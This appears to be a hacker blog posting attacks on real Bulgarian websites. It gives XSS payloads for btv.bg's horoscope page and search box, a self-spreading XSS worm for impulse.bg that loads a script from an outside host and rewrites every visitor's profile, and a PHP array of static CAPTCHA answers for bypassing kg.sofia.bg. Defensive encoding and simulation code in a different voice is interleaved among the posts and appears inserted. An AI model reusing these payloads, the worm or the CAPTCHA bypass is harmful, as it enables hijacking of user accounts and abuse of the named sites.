new btv.bg multiple xss issues

new year, new site, new…xsses 🙂

http://www.btv.bg/horoscope/daily_horoscope.pcgi?sign_id=

"][/img][/h3][script]alert('nigonized')[/script]<!--

search box xss vuln:

"][script]alert('nigonized')[/script]<!--

to be continued….
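Both payloads above break out of a quoted attribute (the leading `"`), close the tags the value sits in, open a script element and comment out whatever the template appends afterwards. The following is an added example, not code from the original post or from btv.bg: a hypothetical template that drops sign_id straight into an img src inside an h3 (the shape is inferred from the payload, with the square brackets read as a display substitution for angle brackets), next to the same template with attribute encoding and a numeric allowlist for the parameter. The template markup, the function names and the allowlist rule are assumptions for illustration.

```javascript
// Added example (not from the original post). Hypothetical server-side template for
// daily_horoscope.pcgi: the sign_id query parameter is concatenated into a src attribute.
function renderVulnerable(signId) {
  return '<h3><img src="/horoscope/sign_' + signId + '.gif"></h3>';
}

// Encode the five characters that can change meaning in HTML text or a quoted attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, function (c) {
    return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c];
  });
}

// Hardened template: same markup, but the untrusted value is encoded for the attribute context.
function renderSafe(signId) {
  return '<h3><img src="/horoscope/sign_' + escapeHtml(signId) + '.gif"></h3>';
}

// Second layer (assumed rule): a sign id is a small integer, so anything else is rejected
// before it ever reaches a template.
function isValidSignId(id) {
  return /^\d{1,2}$/.test(String(id));
}

// The post's first payload with the display substitution undone ([ ] -> < >).
const PAYLOAD = '"></img></h3><script>alert(\'nigonized\')</script><!--';

// Crude check used here: does the rendered page contain a script element the template never wrote?
function hasInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Stand-alone run: show both renderings side by side.
console.log('vulnerable:', renderVulnerable(PAYLOAD));
console.log('encoded:   ', renderSafe(PAYLOAD));
console.log('allowlist accepts payload?', isValidSignId(PAYLOAD));
```

The encoded output still contains the payload text, but as `&quot;&gt;&lt;/img&gt;…`, so the browser keeps it inside the attribute value and never sees a `<script>` element; the allowlist is the cheaper check and should run first, the encoding is what protects every other place the value is echoed.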

ff's grand sixteen

  1. HackBar [ https://addons.mozilla.org/en-US/firefox/addon/3899 ]
  2. FireBug [ https://addons.mozilla.org/en-US/firefox/addon/1843 ]
  3. Anonymouser [ https://addons.mozilla.org/en-US/firefox/addon/1415 ]
  4. Whois [ https://addons.mozilla.org/en-US/firefox/addon/603 ]
  5. Web Developer [ https://addons.mozilla.org/en-US/firefox/addon/60 ]
  6. SwitchProxy Tool [ https://addons.mozilla.org/en-US/firefox/addon/125 ]
  7. FoxyProxy [ https://addons.mozilla.org/en-US/firefox/addon/2464 ]
  8. Reload Every [ https://addons.mozilla.org/en-US/firefox/addon/115 ]
  9. User Agent Switcher [ https://addons.mozilla.org/en-US/firefox/addon/59 ]
  10. View Cookies [ https://addons.mozilla.org/en-US/firefox/addon/3587 ]
  11. Modify Headers [ https://addons.mozilla.org/en-US/firefox/addon/967 ]
  12. TiX Now! [ https://addons.mozilla.org/en-US/firefox/addon/3601 ]
  13. Wmlbrowser [ https://addons.mozilla.org/en-US/firefox/addon/62 ]
  14. XSS Me [ http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi ]
  15. SQL Inject Me [ http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi ]
  16. Greasemonkey [ https://addons.mozilla.org/en-US/firefox/addon/748 ]

worming impulse.bg

impulse.bg allows HTML in the "title" field, exactly as myspace.com does, with the small difference that nothing is filtered out.

What jumps out immediately is this:

GET /js/scriptaculous/scriptaculous.js

which by itself makes our job easier and prettier: scriptaculous pulls in Prototype, so every page already ships an Ajax wrapper (Ajax.Request) that a payload can call without bringing its own. Putting something like this into the "Заглавие" (Title) field:

{script src="www.mysite.com/impulse.js"}{/script}


impulse.js contents:

// impulse.js runs in the visitor's browser with the visitor's own impulse.bg session,
// so the POST to /myinfo rewrites the visitor's profile, not the attacker's.
// "title" carries the same script tag again, which is what makes the payload self-propagating.
var params = "name=wormy!&email=nigon.hacked.in%40gmail.com&country=1&city_id=5&" +
    "city=&birthday=11&birthmonth=8&birthyear=1980&gender=1&" +
    "search_gender=2&height=0&weight=0&eyes=0&hair=0&" +
    "occupation=0&smoke=1&alchohol=1&title=%3Cscript%20src" +
    "%3D%22http%3A%2F%2Fmysite.com/impulse.js%22%3E%3C%2Fscript%3E&" +
    "info=&msg_report=1&comment_report=1&" +
    "Submit=%D0%9F%D1%80%D0%BE%D0%BC%D0%B5%D0%BD%D0%B8"; // Submit value is "Промени" (Change), URL-encoded

// Ajax.Request is Prototype's, loaded by the site itself together with scriptaculous.
var MyAjax = new Ajax.Request('/myinfo', {
    method: 'post',
    parameters: params
});

result:
on every visit to the "infected" profile… every user logged into the system will be infected too… and so on without end… for effect we could change the JavaScript code by adding extras like window.location=. Creativity is the key. 😉
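To make the propagation mechanics concrete, here is an added simulation, not the original worm and not impulse.bg's code: a toy site with one profile per user, a render step that places the stored title into the page, and a visit step that emulates "the script tag survived unencoded, so impulse.js ran in the viewer's session and submitted the same title for them". The user names, the visit order and the `Site` class are invented for the example; the fix shown is output encoding of the title at render time, which is what actually breaks the loop.

```javascript
// Added example (not from the original post): toy model of a self-propagating stored XSS.
const PAYLOAD = '<script src="http://mysite.com/impulse.js"></script>';

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, function (c) {
    return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c];
  });
}

// Hypothetical site: one profile per user, "title" is whatever the user last submitted.
class Site {
  constructor(users, encodeOutput) {
    this.profiles = new Map(users.map(function (u) { return [u, { title: 'hello' }]; }));
    this.encodeOutput = encodeOutput;   // false = raw HTML allowed in title (the vulnerable state)
  }

  // GET /profile/<owner>: the stored title is placed into the page.
  render(owner) {
    var t = this.profiles.get(owner).title;
    return '<h1>' + (this.encodeOutput ? escapeHtml(t) : t) + '</h1>';
  }

  // POST /myinfo: authenticated by the caller's cookie, so it rewrites the *caller's* profile.
  myinfo(viewer, fields) {
    this.profiles.get(viewer).title = fields.title;
  }

  // One page view. The browser is modelled crudely: if the script tag is present unencoded in the
  // rendered HTML it executes, and impulse.js then posts the same title in the viewer's session.
  visit(viewer, owner) {
    if (this.render(owner).indexOf(PAYLOAD) !== -1) {
      this.myinfo(viewer, { title: PAYLOAD });
      return true;
    }
    return false;
  }

  infected() {
    return Array.from(this.profiles)
      .filter(function (e) { return e[1].title === PAYLOAD; })
      .map(function (e) { return e[0]; });
  }
}

// Same seed and the same visit sequence, with and without output encoding.
function simulate(encodeOutput) {
  var site = new Site(['mallory', 'alice', 'bob', 'carol'], encodeOutput);
  site.myinfo('mallory', { title: PAYLOAD });   // attacker seeds the worm in their own title
  var visits = [['alice', 'mallory'], ['bob', 'alice'], ['carol', 'bob'], ['carol', 'alice']];
  visits.forEach(function (v) { site.visit(v[0], v[1]); });
  return site.infected();
}

console.log('raw HTML in title :', simulate(false));
console.log('encoded on render :', simulate(true));
```

Without encoding, each viewer becomes a carrier after one visit and the infected set grows with the visit graph; with encoding, mallory's profile still holds the string but nobody who views it executes anything. A CSRF token on /myinfo would not help here, because the script runs on the same origin and can read the token.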

kids…gardens…stupidity…fakery

demagoguery's turn…

after this happened:

http://news.ibox.bg/news/id_2042186633

a CAPTCHA ("CAPCTHA") was introduced on the same site… well, yes, but no…

http://kg.sofia.bg/i/captcha/1-100.GIF

stupidity after stupidity… the challenge is one of a hundred static GIFs served from a predictable path, so what happens once all the .gifs (1-100… about twenty minutes of work) are transcribed into a single array? I don't know… I don't understand…

<?php
// Assumed mapping: $captchas[$i - 1] is the text shown in /i/captcha/$i.GIF, $i = 1..100.
$captchas = array(
"T490","25T4","441T","4984","5500","5561",
"8597","5T24","1864","2514","T154","2556",
"4612","3296","64T0","5354","6000","458T",
"1190","916T","6082","5819","4102","3169",
"419T","1014","1355","8566","8829","5045",
"5580","6268","16T3","4047","3315","3445",
"T3T6","4380","8389","4404","235T","4808",
"1005","9509","T592","5341","64TT","T316",
"6159","2127","T965","T223","5522","6333",
"5832","3122","3916","T839","8695","5433",
"3T96","8483","8540","9900","2847","T005",
"4844","6220","8150","616T","TT30","31TT",
"3684","9502","2T96","T965","9281","9989",
"1026","9026","5668","3911","40T5","4624",
"TT64","6039","T985","802T","1294","240T",
"14TT","TT14","21T3","998T","2412","8132",
"4835","890T","2163","5291");